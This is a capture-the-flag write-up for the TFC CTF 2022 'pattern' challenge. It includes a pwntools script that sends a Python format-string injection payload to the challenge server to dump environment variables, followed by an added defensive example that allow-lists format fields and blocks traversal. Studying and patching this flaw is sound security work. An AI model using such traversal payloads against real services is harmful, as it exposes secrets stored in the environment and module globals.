GeorgeBanu

pattern

This task was part of the TFC CTF 2022 competition.

This is a basic command injection challenge. Review the provided source code and you'll find that the target is the message object, an instance of the Message class.

The source code shows that the __repr__ method is being set to the same function as __str__. This means that when repr(message) or str(message) is called, it returns the message string. So you need to manipulate how the message string is processed.

from pwn import * 
import re 

# avoid warnings when you run the python code
import warnings
warnings.filterwarnings("ignore")

server_IP = "34.107.71.117"
server_port = 30840

# Open connection
connection = remote(server_IP,server_port)
# payload used to get the flag
payload = '{message.__class__.__init__.__globals__[os].environ}'

# send payload
connection.sendlineafter("pattern> ",payload)
connection.sendlineafter("count> ",'1')


# get response and print the output 
response = connection.recvline()
#print(response.decode())

# Search for flag
flag = re.search(r'flag\{.*?\}', response.decode())
if flag:
    print(f"Flag found: {flag.group(0)}")
else:
    print("Flag not found.")

# close the connection
connection.close()
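
Why a field like the one in the payload resolves, and how the server side can refuse it. This is an added example, not the challenge source or the author's code: it assumes the server passes the user's pattern to str.format with the message object as a keyword argument (which the payload's shape implies), and Message, API_TOKEN, render_vulnerable, render_safe and PlainFieldFormatter are constructed names.

```python
import string

API_TOKEN = "constructed-secret-value"  # constructed stand-in for a server-side secret


class Message:
    """Assumed shape of the challenge class: __repr__ aliases __str__."""

    def __init__(self, text):
        self.text = text

    def __str__(self):
        return self.text

    __repr__ = __str__


def render_vulnerable(pattern, message):
    # The user controls the format string itself, so a replacement field may
    # walk attributes and indexes starting from `message`, for example
    # .__class__.__init__.__globals__[NAME], and reach module globals.
    return pattern.format(message=message)


class PlainFieldFormatter(string.Formatter):
    """Accept only bare, allow-listed field names: no '.', no '[...]'."""

    allowed = {"message"}

    def get_field(self, field_name, args, kwargs):
        # field_name arrives unparsed, e.g. "message.__class__"; an exact
        # match against the allow-list rejects every traversal form and
        # positional fields such as "{}" or "{0}".
        if field_name not in self.allowed:
            raise ValueError(f"field not allowed: {field_name!r}")
        return kwargs[field_name], field_name


def render_safe(pattern, message):
    # Nested fields inside a format spec also pass through get_field.
    return PlainFieldFormatter().vformat(pattern, (), {"message": message})


if __name__ == "__main__":
    m = Message("hello")
    probe = "{message.__class__.__init__.__globals__[API_TOKEN]}"
    print(render_vulnerable(probe, m))
    try:
        render_safe(probe, m)
    except ValueError as exc:
        print("rejected:", exc)
```

Keeping secrets out of module globals and the process environment of the service that renders user input limits what a missed traversal can reach.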

Last updated 9 months ago